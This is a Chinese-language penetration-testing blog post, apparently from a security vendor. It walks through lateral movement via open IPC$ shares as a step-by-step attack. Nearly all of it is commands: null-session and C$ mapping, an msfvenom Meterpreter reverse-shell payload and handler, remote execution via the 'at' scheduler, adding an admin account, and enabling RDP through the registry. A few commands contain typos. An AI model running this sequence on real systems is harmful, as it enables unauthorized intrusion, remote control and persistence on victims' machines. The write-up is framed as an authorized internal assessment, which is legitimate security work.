百步穿杨之IPC
华云安
- 关注
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
百步穿杨之IPC
小编在跟进某个内网检查项目时,碰到了开启IPC$默认共享的情况,这可是很难得的机会能碰到这种暴露的攻击点,马上上阵,直捣黄龙。

首先netsacan扫描整个ip段,发现ipc$默认共享处于开启状态。使用命令建立IPC$空连接:
net use \\10.xxx.xxx.xxx\ipc$
如果能获取SMB的user和passwrod,则可以使用以下命令建立完整的用户名,密码连接:
net user \\10.xxx.xxx.xxx\ipc$ “password” /user:”username”
连接成功。那就把C盘给映射出来,执行以下命令:
Net use z: \\10.xxx.xxx.xxx\c$
将c映射到z盘
如果是获取到SMB的user和password的,可用以下命令:
Net user z: \\10.xxx.xxx.xxx\c$ “password” /user:”username”


接下来就是给目标机上个木马,使之能够控制目标主机。
此时上大杀气,使用msf生产远程木马
Msfvenom -platform windows -p windows/meterpreter/reverse_tcp LHOST=10.xxx.xxx.xxx LPORT=4444 EXITFUNC=thread -b ‘\x00’ -f exe-only -o test_payload.exe

然后将马放入隐射出来的c盘中。

之后msf启动监听
Use exploit/multi/handler

Set payload windows/meterpreter/reverse_tcp

Set lhost 10.xxx.xxx.xxx.xxx
Set lport 4444
执行exploit之后,静置监听。
然后需要在目标机器上执行木马,则用计划任务的方式执行。
返回命令行,使用
Net time \\10.xxx.xxx.xxx
查看目标时间

使用
at \\10.xxx.xxx.xx 10:04 C:\Users\Administrator\Pictures\test_payload.exe
将木马放入计划任务中

之后在msf中等待一会儿,就接受到反弹shell


添加一个User5账号

将该账号组更改到administrators下

想要通过远程桌面连接上去,便使用命令开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f


之后用添加的用户远程连接即可
最后记得处理删除IPC$连接。
net use \\xxx.xxx.xxx.xxx\ipc$ /del
总结
本次仅针对IPC入侵做文章记录,通过开启IPC$默认共享的机子进行了横向移动。利用此管道可以在目标是空连接或者知道目标SMB用户名和密码的情况下来完成。
本文为 华云安 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
《2024年中国金融行业网络安全案例集》发布,华云安攻击面管理案例入选!
2024-05-30
浅谈如何利用数据治理技术做好攻击面资产管理
2024-05-21
深入了解入侵和攻击模拟(BAS):构建更强大的网络安全防御体系
2024-05-11
文章目录